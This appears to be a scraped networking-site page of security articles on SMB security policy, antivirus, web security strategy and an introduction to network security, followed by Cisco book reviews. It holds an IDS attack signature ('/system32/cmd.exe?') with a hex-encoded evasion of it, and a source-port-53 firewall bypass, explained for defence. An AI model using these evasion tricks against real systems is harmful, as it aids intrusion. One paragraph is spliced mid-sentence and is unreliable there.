There are various policies, some of which can be enforced through technology and others which have to be enforced through human resources. For example, password complexity policies can be enforced through Windows domain policies. On the other hand, a policy which ensures that company USB sticks are not taken home may need to be enforced through awareness and labeling.
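
In a Windows domain such password settings normally live in Group Policy, but the same ideas can be checked or set on an individual machine with the built-in net accounts command; a sketch:

net accounts /minpwlen:10 /maxpwage:60 /uniquepw:5

This sets a minimum password length of 10 characters, a maximum password age of 60 days, and prevents reuse of the last 5 passwords; running net accounts with no arguments simply displays the current policy, which is a quick way to audit a machine.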

As with most security precautions, it is important that policies that affect security are driven by business objectives rather than gut feelings. If security policies are too strict, they will be bypassed, creating a false sense of security and possibly opening new attack vectors.

Role Separation

Separation of duties, auditing and the principle of least privilege can go a long way in protecting an organization from having single points of failure and privilege creep. By employing separation of duties, the impact of a particular employee turning against the organization is greatly reduced. For example, a system administrator who is not allowed to make alterations to the database server directly, but has to ask the database administrator and document his actions, is a good use of separation of duties.

A security analyst who receives a report when a network operator makes changes to the firewall access control lists is a good application of auditing. If a manager has no business need to install software on a regular basis, then his or her account should not be granted such privileges (power user on Windows). These concepts are very important, and it all boils down to who is watching the watchers.

Backup and Redundant Systems

Although less glamorous than other topics in Information Security, backups remain one of the most reliable solutions. Making use of backups can have a direct business benefit when things go wrong. Disasters do occur, and an organization will come across situations when hardware fails or a user (intentionally or otherwise) deletes important data.

A well-managed and tested backup system will get the business back up and running in very little time compared to other disaster recovery solutions. It is therefore important that backups are not only automated to avoid human error but also periodically tested. It is useless having a backup system if restoration does not function as advertised.

Redundant systems allow a business to continue working even if a disaster occurs. Backup servers and alternative network connections can help to reduce downtime, or at least provide a business with limited resources until all systems and data are restored.
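
A backup is only as good as its restore, so even a simple scheduled job should verify its own output. A rough sketch using standard Unix tools (all paths are placeholders):

# create the archive, then list its contents to confirm the archive is readable
tar -czf /backups/data-backup.tar.gz /srv/data && tar -tzf /backups/data-backup.tar.gz > /dev/null
echo $?    # 0 means both the backup and the verification step succeeded

A listing test is not a full restore, so periodically restoring a sample of files to a scratch location is still worthwhile.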

Keeping your Systems Patched

New advisories addressing security vulnerabilities in software are published on a daily basis. It is not an easytask to stay up-to-date with all the vulnerabilities that apply for software installed on the network, thereforemany organizations make use of a patch management system to handle the task. It is important to note thatpatches and security updates are not only issued for Microsoft products but also for third party software. Forexample, although the web browser is running the latest updates, a desktop can still be compromised whenvisiting a website simply because it is running a vulnerable version of Adobe Flash.

Additionally it may beimportant to assess the impact of vulnerability before applying a patch, rather than applying patchesreligiously. It is also important to test security updates before applying them to a live system. The reason is that,from time to time, vendors issue patches that may conflict with other systems or that were not tested for yourparticular configuration.

Additionally, security updates may sometimes result in temporary downtime, forexposureSimple systems are easier to manage and therefore any security issues that apply to such systems can beaddressed with relative ease. However, complex systems and networks make it harder for a security analyst toassess their security status. For example, if an organization does not need to expose a large number of services on the Internet, the firewall configuration would be quite straightforward. However, the greater the company’sneed to be visible – an online retailer, for example – the more complex the firewall configuration will be, leavingroom for possible security holes that could be exploited by attackers to access internal network services.

When servers and desktop computers have fewer software packages installed, they are easier to keep up-to-date and manage. This concept can work hand in hand with the principle of least privilege. By making use of fewer components, less software and fewer privileges, you reduce the attack surface and allow security efforts to focus on real issues.

Conclusion

Security in small and medium-sized businesses is more than just preventing viruses and blocking spam. In 2009, cybercrime is expected to increase as criminals attempt to exploit weaknesses in systems and in people. This document aims to give managers, analysts, administrators and operators in small and medium-sized businesses a snapshot of the IT security threats facing their organization. Every organization is different but in many instances the threats are common to all. Security is a cost of doing business but those that prepare themselves well against possible threats will benefit the most in the long term.



  • Hits: 33338

Web Security Software Dealing With Malware

It is widely acknowledged that any responsible modern-day organization will strive to protect its network against malware attacks. Each day brings on a spawning of increasingly sophisticated viruses, worms, spyware, Trojans, and all other kinds of malicious software which can ultimately lead to an organization's network being compromised or brought down. Private information can be inadvertently leaked, a company's network can crash; whatever the outcome, poor security strategies could equal disaster. Having a network that is connected to the Internet leaves you vulnerable to attack, but Internet access is an absolute necessity for most organizations, so the wise thing to do would be to have a decent web security package installed on your machines, preferably at the gateway.

There are several antivirus engines on the market and each product has its own heuristics, and subsequently its own particular strengths and weaknesses. It's impossible to claim any one as the best overall at any given time. It can never be predicted which antivirus lab will be the quickest to release an update providing protection against the next virus outbreak; it is often one company on one occasion and another one the next.

Web security can never be one hundred percent guaranteed at all times, but there are ways to significantly minimize the risks. It is good and common practice to use an antivirus engine to help protect your network, but it would naturally be much better to use several of them at once. Why is this? If, hypothetically speaking, your organization uses product A and a new virus breaks out, it might be Lab A or Lab B, or any other antivirus lab, which releases an update the fastest. So the logical conclusion would be that the more AV engines you make use of, the greater the likelihood of nipping that attack in the bud.

This is one of the ways in which web security software can give you better peace of mind. Files downloaded on any of your company's computers can each be scanned using several engines, rather than just one, which significantly reduces the time it takes to obtain the latest virus signatures and thereby diminishes the risk each new attack poses to your network.
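As a minimal sketch of this idea (the engine names and detection functions below are made up for illustration, not a real vendor API), a file is treated as suspicious if any one of several engines flags it:

# Toy multi-engine scan: a file is reported if ANY engine flags it.
# The three 'engines' below are fictitious stand-ins for real AV products.

def engine_a(data): return b"pattern-a" in data
def engine_b(data): return b"pattern-b" in data
def engine_c(data): return b"pattern-c" in data

ENGINES = {"Engine A": engine_a, "Engine B": engine_b, "Engine C": engine_c}

def scan_with_all_engines(path):
    """Return the names of the engines that flagged the file (empty list = clean)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [name for name, engine in ENGINES.items() if engine(data)]

The more engines in the dictionary, the greater the chance that at least one of them already has a signature for a brand-new outbreak.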

Another plus side of web security software is that multiple download control policies can be set according to the individual organization's security policies, which could be either user, group or IP-based, controlling the downloading of different file types such as JavaScript, MP3, MPEG, exe, and more by specific users/groups/IP addresses. Hazardous files like Trojan downloader programs very often appear disguised as harmless files in order to gain access to a system. A good web security solution will analyze and detect the real file types of HTTP/FTP file downloads, making sure that downloaded files contain no viruses or malware.
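The sketch below illustrates the principle behind such 'real file type' detection: rather than trusting the file extension, the first few bytes of the file (its magic number) are inspected. The magic values shown are well known, but the function itself is only an illustration of the technique, not how any particular product implements it.

# Identify a downloaded file by its magic bytes rather than by its extension.
MAGIC_NUMBERS = {
    b"MZ":           "Windows executable (exe/dll)",
    b"\x7fELF":      "Linux executable",
    b"PK\x03\x04":   "ZIP archive (also docx/xlsx/jar)",
    b"%PDF":         "PDF document",
    b"\xff\xd8\xff": "JPEG image",
}

def real_file_type(path):
    """Return a human-readable type based on the file header, or 'unknown'."""
    with open(path, "rb") as fh:
        header = fh.read(8)
    for magic, description in MAGIC_NUMBERS.items():
        if header.startswith(magic):
            return description
    return "unknown"

# A Trojan downloader renamed to 'holiday_photo.jpg' would still be reported as a
# Windows executable, because its header starts with the bytes "MZ".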

The long and short of it is this: you want the best security possible for your network, but it's not within anyone's power to predict which AV lab will release the next update first. Rather than playing Russian roulette by sticking to one AV engine, adopt a web security package that will enable you to use several of them.

  • Hits: 13683

The Web Security Strategy for Your Organization

In today's business world, internet usage has become a necessity for doing business. Unfortunately, a company's use of the internet comes with considerable risk to its network and business information.

Web security threats include phishing attacks, malware, scareware, rootkits, keyloggers, viruses and spam. While many attacks occur when information is downloaded from a website, others are now possible through drive-by attacks where simply visiting a website can infect a computer. These attacks usually result in data and information leakage, loss in productivity, loss of network bandwidth and, depending on the circumstances, even liability issues for the company. In addition to all this, cleanup from malware and other types of attacks on a company's network is usually costly, in terms of both money and the time spent recovering from these web security threats.

Fortunately, there are steps a company can take to protect itself from these web security threats. Some are more effective than others, but the following suggestions should help narrow down the choices.

Employee Internet Usage Policy

The first and probably the least expensive solution would be to develop and implement an employee internet usage policy. This policy should clearly define what an employee can and cannot do when using the internet. It should also address personal usage of the internet on the business computer. The policy should identify the type of websites that can be accessed by the employee for business purposes and what, if any, type of material can be downloaded from the internet. Always make sure the information contained in the policy fits your unique business needs and environment.

Employee Education

Train your employees to recognize web security threats and how to lower the risk of infection. In today's business environment, laptops, smartphones, iPads, and other similar devices are not only used for business purposes, but also for personal and home use. When devices are used at home, the risk of an infection on that device is high and malware could easily be transferred to the business network. This is why employee education is so important.

Patch Management

Good patch management practices should also be in place and implemented using a clearly-defined patch management policy. Operating systems and applications, including browsers, should be updated regularly with the latest available security patches. The browser, whether a mobile version used on a smartphone or a full version used on a computer, is a primary vector for malware attacks and merits particular attention. Using the latest version of a browser is a must, as known vulnerabilities will have been addressed.

Internet Monitoring Software

Lastly, I would mention the use of internet monitoring software. Internet monitoring software should be able to protect the network against malware, scareware, viruses, phishing attacks and other malicious software. A robust internet monitoring software solution will help to enforce your company's internet usage policy by blocking connections to unacceptable websites, by monitoring downloads, and by monitoring encrypted web traffic going into and out of the network.

There is no single method that can guarantee 100% web security protection, however a well thought-out strategy is one huge step towards minimizing the risk that the network will be targeted by the bad guys.

 



  • Hits: 18348

Introduction To Network Security - Part 1

As more and more people and businesses have begun to use computer networks and the Internet, the need for a secure computing environment has never been greater. Right now, information security professionals are in great demand and the importance of the field is growing every day. All the industry leaders have been placing their bets on security in the last few years.

All IT vendors agree today that secure computing is no longer an optional component; it is something that should be integrated into every system rather than being thrown in as an afterthought. Usually programmers would concentrate on getting a program working, and then (if there was time) try to weed out possible security holes.

Now, applications must be coded from the ground up with security in mind, as these applications will be used by people who expect the security and privacy of their data to be maintained.

This article intends to serve as a very brief introduction to information security with an emphasis on networking.

The reasons for this are twofold:

Firstly, in case you did not notice, this is a networking website,

Secondly, the time a system is most vulnerable is when it is connected to the Internet.

For an understanding of what lies in the following pages, you should have decent knowledge of how the Internet works. You don't need to know the ins and outs of every protocol under the sun, but a basic understanding of network (and obviously computer) fundamentals is essential.

If you're a complete newbie, however, do not despair. We would recommend you look under the Networking menu at the top of the site, where you will find our accolade-winning material on pretty much everything in networking.

Hacker or Cracker?

There is a well-worn argument against the incorrect use of the word 'hacker' to denote a computer criminal -- the correct term is 'cracker' or, when referring to people who have automated tools and very little real knowledge, 'script kiddie'. Hackers are actually just very adept programmers (the term came from 'hacking the code', where a programmer would quickly program fixes to problems he faced).

While many feel that this distinction has been lost due to the media portraying hackers as computer criminals, we will stick to the original definitions throughout these articles, more than anything to avoid the inevitable flame mail we will get if we don't!

On to the Cool Stuff!

This introduction is broadly broken down into the following parts:

• The Threat to Home Users
• The Threat to the Enterprise
• Common Security Measures Explained
• Intrusion Detection Systems
• Tools an Attacker Uses
• What is Penetration-Testing?
• A Brief Walk-through of an Attack
• Where Can I Find More Information?
• Conclusion

The Threat to Home Users

Many people underestimate the threat they face when they use the Internet. The prevalent mindset is "who would bother to attack me or my computer?". While it is true that an attacker is unlikely to target you individually, to him you are just one more system on the Internet.

Many script kiddies simply unleash an automated tool that will scan large ranges of IP addresses looking for vulnerable systems; when it finds one, the tool will automatically exploit the vulnerability and take control of the machine.

The script kiddie can later use this vast collection of 'owned' systems to launch denial of service (DoS) attacks, or just cover his tracks by hopping from one system to another in order to hide his real IP address.

This technique of proxying attacks through many systems is quite common, as it makes it very difficult for law enforcement to trace back the route of the attack, especially if the attacker relays it through systems in different geographic locations.

It is very feasible -- in fact quite likely -- that your machine will be in the target range of such a scan, and if you haven't taken adequate precautions, it will be owned.

The other threat comes from computer worms that have recently been the subject of a lot of media attention. Essentially a worm is just an exploit with a propagation mechanism. It works in a manner similar to how the script kiddie's automated tool works -- it scans ranges of IP addresses, infects vulnerable machines, and then uses those to scan further.

Thus the rate of infection increases geometrically as each infected system starts looking for new victims. In theory a worm could be written with such a refined scanning algorithm, that it could infect 100% of all vulnerable machines within ten minutes. This leaves hardly any time for response.

Another threat comes in the form of viruses. Most often these are propagated by email and use some crude form of social engineering (such as using the subject line "I love you" or "Re: The documents you asked for") to trick people into opening them. No form of network level protection can guard against these attacks.

The effects of a virus may range from the mundane (simply spreading to people in your address book) to the devastating (deleting critical system files). A couple of years ago there was an email virus that emailed confidential documents from the popular Windows "My Documents" folder to everyone in the victim's address book.

So while you per se may not be high profile enough to warrant a systematic attack, you are what I like to call a bystander victim: someone who got attacked simply because you could be attacked, and you were there to be attacked.

As broadband and always-on Internet connections become commonplace, attackers are even targeting the IP ranges where they know they will find cable modem customers. They do this because they know they will find unprotected always-on systems there that can be used as a base for launching other attacks.

The Threat to the Enterprise

Most businesses have conceded that having an Internet presence is critical to keep up with the competition, and most of them have realised the need to secure that online presence.

Gone are the days when firewalls were an option and employees were given unrestricted Internet access. These days most medium sized corporations implement firewalls, content monitoring and intrusion detection systems as part of the basic network infrastructure.

For the enterprise, security is very important -- the threats include:

• Corporate espionage by competitors,
• Attacks from disgruntled ex-employees
• Attacks from outsiders who are looking to obtain private data and steal the company's crown jewels (be it a database of credit cards, information on a new product, financial data, source code to programs, etc.)
• Attacks from outsiders who just want to use your company's resources to store pornography, illegal pirated software, movies and music, so that others can download and your company ends up paying the bandwidth bill and in some countries can be held liable for the copyright violations on movies and music.

As far as securing the enterprise goes, it is not enough to merely install a firewall or intrusion detection system and assume that you are covered against all threats. The company must have a complete security policy, and basic training must be imparted to all employees telling them things they should and should not do, as well as who to contact in the event of an incident. Larger companies may even have an incident response or security team to deal specifically with these issues.

One has to understand that security in the enterprise is a 24/7 problem. There is a famous saying, "A chain is only as strong as its weakest link", the same rule applies to security.

After the security measures are put in place, someone has to take the trouble to read the logs, occasionally test the security, follow mailing-lists of the latest vulnerabilities to make sure software and hardware is up-to-date etc. In other words, if your organisation is serious about security, there should be someone who handles security issues.

This person is often a network administrator, but invariably in the chaotic throes of day-to-day administration (yes we all dread user support calls ! :) the security of the organisation gets compromised -- for example, an admin who needs to deliver 10 machines to a new department may not password protect the administrator account, just because it saves him some time and lets him meet a deadline. In short, an organisation is either serious about security issues or does not bother with them at all.

While the notion of 24/7 security may seem paranoid to some people, one has to understand that in a lot of cases a company is not specifically targeted by an attacker. The company's network just happens to be one that the attacker knows how to break into, and thus it gets targeted. This is often the case in attacks where company FTP or web servers have been used to host illegal material.

The attackers don't care what the company does - they just know that this is a system accessible from the Internet where they can store large amounts of warez (pirated software), music, movies, or pornography. This is actually a much larger problem than most people are aware of because, in many cases, the attackers are very good at hiding the illegal data. It's only when the bandwidth bill has to be paid that someone realises that something is amiss.

Firewalls

By far the most common security measure these days is a firewall. A lot of confusion surrounds the concept of a firewall, but it can basically be defined as any perimeter device that permits or denies traffic based on a set of rules configured by the administrator. Thus a firewall may be as simple as a router with access-lists, or as complex as a set of modules distributed through the network and controlled from one central location.

The firewall protects everything 'behind' it from everything in front of it. Usually the 'front' of the firewall is its Internet facing side, and the 'behind' is the internal network. The way firewalls are designed to suit different types of networks is called the firewall topology.

Here is the link to a detailed explanation of different firewall topologies: Firewall.cx Firewall Topologies

You also get what are known as 'personal firewalls' such as ZoneAlarm, Sygate Personal Firewall, Tiny Personal Firewall, Symantec Endpoint Security etc.

These are packages that are meant for individual desktops and are fairly easy to use. The first thing they do is make the machine invisible to pings and other network probes. Most of them also let you choose what programs are allowed to access the Internet, therefore you can allow your browser and mail client, but if you see some suspicious program trying to access the network, you can disallow it. This is a form of 'egress filtering' or outbound traffic filtering and provides very good protection against trojan horse programs and worms.

However, firewalls are no cure-all solution to network security woes. A firewall is only as good as its rule set, and there are many ways an attacker can find common misconfigurations and errors in the rules. For example, say the firewall blocks all traffic except traffic originating from port 53 (DNS) so that everyone can resolve names. The attacker could then use this rule to his advantage: by changing the source port of his attack or scan to port 53, he gets all of his traffic through because the firewall assumes it is DNS traffic.
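As a hedged illustration of why such a rule is dangerous, the following Python sketch (the rule set and packet fields are made up for illustration and do not reflect any vendor's syntax) implements a naive packet filter that permits anything with source port 53. An attacker's probe of TCP port 22 sails straight through simply by setting its source port to 53:

# Toy packet filter that blindly trusts source port 53 (a common misconfiguration).

def firewall_permits(packet):
    """Return True if the over-permissive rule set allows the packet."""
    rules = [
        # (action,  protocol, source_port) -- the destination is never checked
        ("permit", "udp",    53),     # intended: DNS replies
        ("permit", "tcp",    53),     # intended: DNS over TCP / zone transfers
        ("deny",   "any",    None),   # deny everything else
    ]
    for action, proto, src in rules:
        if proto not in ("any", packet["proto"]):
            continue
        if src is not None and packet["src_port"] != src:
            continue
        return action == "permit"
    return False

# An SSH probe disguised with source port 53 is allowed through.
probe = {"proto": "tcp", "src_port": 53, "dst_port": 22}
print(firewall_permits(probe))   # True -- the filter assumes this is DNS traffic

A stateful firewall that tracks which connections were initiated from the inside, rather than trusting source ports, is not fooled by this trick.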

Bypassing firewalls is a whole study in itself, and one which is very interesting, especially to those with a passion for networking, as it normally involves misusing the way TCP and IP are supposed to work. That said, firewalls today are becoming very sophisticated and a well installed firewall can severely thwart a would-be attacker's plans.

It is important to remember the firewall does not look into the data section of the packet, thus if you have a webserver that is vulnerable to a CGI exploit and the firewall is set to allow traffic to it, there is no way the firewall can stop an attacker from attacking the webserver because it does not look at the data inside the packet. This would be the job of an intrusion detection system (covered further on).

Anti-Virus Systems

Everyone is familiar with the desktop versions of anti-virus packages like Norton Antivirus and McAfee. The way these operate is fairly simple -- when researchers find a new virus, they figure out some unique characteristic it has (maybe a registry key it creates or a file it replaces) and out of this they write the virus 'signature'.

The whole load of signatures that your antivirus scans for is what is known as the virus 'definitions'. This is the reason why keeping your virus definitions up-to-date is very important. Many anti-virus packages have an auto-update feature for you to download the latest definitions. The scanning ability of your software is only as good as the date of your definitions. In the enterprise, it is very common for admins to install anti-virus software on all machines, but with no policy for regular updates of the definitions. This is meaningless protection and serves only to provide a false sense of security.
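A rough sketch of the idea follows (the byte patterns and detection names below are entirely fictitious, not real definitions): the scanner simply looks for known byte patterns inside the files it inspects, so it can only ever detect what is already in its definition set.

# Toy signature scanner working from a tiny, made-up definition set.
SIGNATURES = {
    b"evil_dropper_v1":  "Example.Trojan.Dropper",   # fictitious signature
    b"mass_mailer_xyz":  "Example.Worm.MassMailer",  # fictitious signature
}

def scan_file(path):
    """Return the name of the first matching 'virus', or None if no signature matches."""
    with open(path, "rb") as fh:
        data = fh.read()
    for pattern, name in SIGNATURES.items():
        if pattern in data:
            return name
    return None

A brand-new virus whose pattern is not yet in SIGNATURES is simply reported as clean, which is exactly why out-of-date definitions provide a false sense of security.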

With the recent spread of email viruses, anti-virus software at the MTA (Mail Transfer Agent, also known as the 'mail server') is becoming increasingly popular. The mail server will automatically scan any email it receives for viruses and quarantine the infected messages. The idea is that since all mail passes through the MTA, this is the logical point to scan for viruses. Given that most mail servers have a permanent connection to the Internet, they can regularly download the latest definitions. On the downside, these can be evaded quite simply: if you zip up the infected file or trojan, or encrypt it, the anti-virus system may not be able to scan it.

End users must be taught how to respond to anti-virus alerts. This is especially true in the enterprise -- an attacker doesn't need to try and bypass your fortress-like firewall if all he has to do is email trojans to a lot of people in the company. It just takes one uninformed user to open the infected package, and the attacker will have a backdoor into the internal network.

It is advisable that the IT department gives a brief seminar on how to handle email from untrusted sources and how to deal with attachments. These are very common attack vectors simply because you may harden a computer system as much as you like, but the weak point still remains the user who operates it. As crackers say 'The human is the path of least resistance into the network'.

Intrusion Detection Systems

IDSs have become the 'next big thing' the way firewalls were some time ago. There are basically two types of Intrusion Detection Systems:

• Host based IDS
• Network based IDS

Host based IDS - These are installed on a particular important machine (usually a server or some other important target) and are tasked with making sure that the system state matches a particular baseline. For example, the popular file-integrity checker Tripwire -- this program is run on the target machine just after it has been installed. It creates a database of file signatures for the system and regularly checks the current system files against their known 'safe' signatures. If a file has been changed, the administrator is alerted. This works very well as most attackers will replace a common system file with a trojaned version to give them backdoor access.
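A minimal sketch of the file-integrity idea follows (the watched paths and baseline file name are illustrative; this is not how Tripwire itself stores its database): hash the files you care about once, then periodically re-hash them and alert on any difference.

import hashlib, json, os

BASELINE = "baseline.json"          # hypothetical location of the signature database
WATCHED  = ["/bin/ls", "/bin/ps"]   # example files an attacker might replace with trojaned versions

def file_hash(path):
    """SHA-256 digest of a file's contents."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def create_baseline():
    # Run once, right after the system is installed and known to be clean.
    with open(BASELINE, "w") as fh:
        json.dump({p: file_hash(p) for p in WATCHED if os.path.exists(p)}, fh)

def check_baseline():
    # Run regularly; any mismatch means a watched file has been modified.
    with open(BASELINE) as fh:
        known = json.load(fh)
    for path, old_digest in known.items():
        if file_hash(path) != old_digest:
            print(f"ALERT: {path} has been modified")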

Network based IDS - These are more popular and quite easy to install. Basically they consist of a normal network sniffer running in promiscuous mode (in this mode the network card picks up all traffic even if it is not meant for it). The sniffer is attached to a database of known attack signatures and the IDS analyses each packet that it picks up to check for known attacks. For example, a common web attack might contain the string '/system32/cmd.exe?' in the URL. The IDS will have a match for this in the database and will alert the administrator.

Newer IDSs support active prevention of attacks - instead of just alerting an administrator, the IDS can dynamically update the firewall rules to disallow traffic from the attacking IP address for some amount of time. Alternatively, the IDS can use 'session sniping' to fool both sides of the connection into closing down so that the attack cannot be completed.

Unfortunately, IDS systems generate a lot of false positives (a false positive is basically a false alarm, where the IDS sees legitimate traffic and for some reason matches it against an attack pattern). This tempts a lot of administrators into turning them off or, even worse, not bothering to read the logs. This may result in an actual attack being missed.

IDS evasion is also not all that difficult for an experienced attacker. The signature is based on some unique feature of the attack, and so the attacker can modify the attack so that the signature is not matched. For example, the above attack string '/system32/cmd.exe?' could be rewritten in hexadecimal to look something like the following:

'%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f'

This might be totally missed by the IDS. Furthermore, an attacker could split the attack into many packets by fragmenting them. This means that each packet would only contain a small part of the attack and the signature would not match. Even if the IDS is able to reassemble fragmented packets, this creates a time overhead and, since IDSs have to run at near real-time, they tend to drop packets while they are processing. IDS evasion is a topic for a paper on its own.
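A small sketch of this particular evasion, using the example signature and encoding from above (the HTTP request itself is invented for illustration): a naive substring match on the raw request misses the attack, while an IDS that URL-decodes (normalizes) the request before matching catches it.

from urllib.parse import unquote

SIGNATURE = "/system32/cmd.exe?"

# Hypothetical attack request with the path percent-encoded to dodge naive matching.
raw_request = "GET /scripts/..%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f/c+dir HTTP/1.0"

print(SIGNATURE in raw_request)            # False -- the raw bytes never contain the signature
print(SIGNATURE in unquote(raw_request))   # True  -- decoding reveals '/system32/cmd.exe?'

This is why modern IDS engines normalize traffic (URL-decoding, reassembling fragments and so on) before applying signatures, at the cost of the processing overhead mentioned above.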

The advantage of a network based IDS is that it is very difficult for an attacker to detect. The IDS itself does not need to generate any traffic, and in fact many of them have a broken TCP/IP stack so they don't have an IP address. Thus the attacker does not know whether the network segment is being monitored or not.

Patching and Updating

It is embarrassing and sad that this has to be listed as a security measure. Despite being one of the most effective ways to stop an attack, there is a tremendously laid-back attitude to regularly patching systems. There is no excuse for not doing this, and yet the level of patching remains woefully inadequate. Take for example the MSBlaster worm that spread havoc recently. The exploit was known almost a month in advance and a patch had been released, yet millions of users and businesses were still infected. While admins know that having to patch 500 machines is a laborious task, the way I look at it is that I would rather be updating my systems on a regular basis than waiting for disaster to strike and then running around trying to patch and clean up those 500 systems.

For the home user, it's a simple matter of running the automatic update software that every worthwhile OS comes with. In the enterprise there is no 'easy' way to patch large numbers of machines, but there are patch deployment mechanisms that take a lot of the burden away. Frankly, it is part of an admin's job to do this, and when a network is horribly fouled up by the latest worm it just means someone, somewhere didn't do his job well enough.

Click here to read 'Introduction to Network Security - Part 2'

  • Hits: 78271

The VIRL Book – A Guide to Cisco’s Virtual Internet Routing Lab (Cisco Lab)

Cisco’s Virtual Internet Routing Lab (VIRL) is a network simulation tool developed by Cisco that allows engineers, certification candidates and network architects to create their own Cisco Lab using the latest Cisco IOS devices such as Routers, Catalyst or Nexus switches, ASA Firewall appliances and more.

Read Jack Wang's Introduction to Cisco VIRL article to find out more information about the product

Being a fairly new but extremely promising product, it’s quickly becoming the standard tool for Cisco Lab simulations. Managing and operating Cisco VIRL has its challenges, especially for those new to the virtualization world, but one of the biggest problems has been the lack of dedicated online resources for VIRL management, leaving a lot of unanswered questions on how to use VIRL for different types of simulations, how to build topologies, how to fine-tune them and so on.

The recent publication of “The VIRL Book” by Jack Wang has changed the game for VIRL users. The tasks outlined above, plus a lot more, are now becoming easier to handle, helping users manage their VIRL server in an effective and easy to understand way.

The introduction to VIRL has been well crafted by Jack as he addresses each and every aspect of VIRL: why one should opt for VIRL, what VIRL can offer and how it differs from other simulation tools.

This unique title addresses all possible aspects of VIRL and has been written to satisfy even the most demanding users seeking to create complex network simulations. Key topics covered include:

  • Planning the VIRL Installation
  • Installing VIRL
  • Creating your first simulation
  • Basic operation & best practices
  • Understanding the anatomy of VIRL
  • External Connectivity to the world
  • Advanced features
  • Use VIRL for certifications
  • Running 3rd party virtual machines
  • Sample Network Topologies

The Planning the VIRL Installation section walks through the various VIRL installation options, be it a virtual machine, a bare-metal installation or the cloud, and what kind of hardware suits each. This makes it easier for VIRL users to plan well and select the right hardware for their VIRL installation.


Figure 1. Understanding the Cisco VIRL work-flow

The Installing VIRL section is quite engaging as Jack walks through the installation of VIRL on various platforms such as VMware vSphere ESXi, VMware Fusion, VMware Workstation, bare metal and the cloud. All these installations are described in simple steps and with great illustrations. The troubleshooting part happens to be the cream of this section as it dives into small details such as BIOS settings and more, proving how attentive the author is to simplifying troubleshooting.

The Creating your first simulation section is very helpful as it goes through, in depth, how to create a simulation, compares Design mode and Simulation mode, covers generating initial configurations and more. This section really helped us understand VIRL in depth, and especially how to create a simulation with auto configurations.

The External connectivity to the world section helps the user open up to a new world of virtualization and lab simulations. Jack really mastered this section and simplified the concepts of FLAT network and SNAT network while at the same time dealing with issues like how to add 3rd party virtual machines into VIRL. The Palo Alto Firewall integration happens to be our favorite.

To summarize, this title is a must-have guide for all Cisco VIRL users as it deals with every aspect of VIRL, and we believe this not only simplifies the use of the product but also helps users understand how far they can go with it. Jack’s hard work and insights are visible in every section of the book, and we believe it’s not an easy task to come out with such a great title. We certainly congratulate Jack. This is a title that should not be missing from any Cisco VIRL user’s library.

  • Hits: 16912

Cisco Press Review for “Cisco Firepower and Advanced Malware Protection Live Lessons” Video Series

Title:              Cisco Firepower & Advanced Malware Protection Live Lessons
Authors:        Omar Santos
ISBN-10:       0-13-446874-0
Publisher:     Cisco Press
Published:    June 22, 2016
Edition:         1st Edition
Language:    English

The “Cisco Firepower and Advanced Malware Protection Live Lessons” video series by Omar Santos is the icing on the cake for someone who wants to start their journey into Cisco Next-Generation Network Security. This video series contains eight lessons on the following topics:

Lesson 1: Fundamentals of Cisco Next-Generation Network Security

Lesson 2: Introduction and Design of Cisco ASA with FirePOWER Services

Lesson 3: Configuring Cisco ASA with FirePOWER Services

Lesson 4: Cisco AMP for Networks

Lesson 5: Cisco AMP for Endpoints

Lesson 6: Cisco AMP for Content Security

Lesson 7: Configuring and Troubleshooting the Cisco Next-Generation IPS Appliances

Lesson 8: Firepower Management Center

Lesson 1 deals with the fundamentals of Cisco Next-Generation Network Security products: security threats, Cisco ASA Next-Generation Firewalls, FirePOWER Modules, Next-Generation Intrusion Prevention Systems, Advanced Malware Protection (AMP), Email Security, Web Security, Cisco ISE, Cisco Meraki Cloud Solutions and much more. Omar Santos has done an exceptional job creating short videos of a maximum of 12 minutes each. He really builds up the series with a very informative introduction dealing with the security threats the industry is currently facing, the emergence of the Internet of Things (IoT) and its impact, and the challenges of detecting threats.

Lesson 2 deals with the design aspects of the ASA FirePOWER Service module: how it can be deployed in production networks, how High-Availability (HA) works, how ASA FirePOWER services can be deployed at the Internet Edge and the VPN scenarios it supports. The modules in this lesson are very brief and provide an overview; anyone looking for in-depth information must refer to the Cisco documentation.

Lesson 3 is the most important lesson of the series as it deals with the initial setup of the Cisco ASA FirePOWER Module in Cisco ASA 5585-X and Cisco ASA 5500-X appliances. Omar also demonstrates how the Cisco ASA redirects traffic to the Cisco ASA FirePOWER module, and he concludes the lesson with basic troubleshooting steps.

Lessons 4, 5 and 6 are dedicated to Cisco AMP for networks, endpoints and content security. Omar walks through an introduction to AMP, and each lesson deals with the various options. It’s a good overview of AMP, and he’s done a commendable job keeping it flowing smoothly. Cisco AMP for Endpoints is quite interesting, as Omar articulates the information in a much easier way and the demonstrations are good to watch.

The best part of this video series is the lesson that deals with the configuration of Cisco ASA with FirePOWER services, where, in a very brief way, Omar shows the necessary steps for a successful deployment on the Cisco ASA 5585-X and Cisco ASA 5500-X platforms.

The great thing about Cisco Press is that it ensures one doesn’t need to hunt for reference or study materials; it always has very informative products in the form of videos and books. You can download these videos and watch them at your own pace.

To conclude, the video series is really good to watch as it deals with the various topics of Cisco Next-Generation Security products in videos of less than 13 minutes each, and the language used is quite simple and easy to understand. However, the series could do with more live demonstrations, especially one on how to reimage the ASA appliances to install the Cisco FirePOWER module.

This is a highly recommended product especially for engineers interested in better understanding how Cisco’s Next-Generation security products operate and more specifically the Cisco FirePOWER services, Cisco AMP and advanced threat detection & protection.

  • Hits: 10655

Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library Review (Route 300-101, Switch 300-115 & Tshoot 300-135)

Title:          Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library
Authors:    Kevin Wallace, David Hucaby, Raymond Lacoste    
ISBN-13:    978-1-58720-663-4
Publisher:  Cisco Press
Published:  December 23rd, 2014
Edition:      1st Edition
Language:  English

Reviewer: Chris Partsenidis

Rating: 5/5 stars

The Cisco CCNP Routing and Switching (CCNP R&S) certification is the most popular Cisco Professional series certification at the moment, requiring candidates to sit and pass three professional level exams: Route 300-101, Switch 300-115 & Tshoot 300-135.

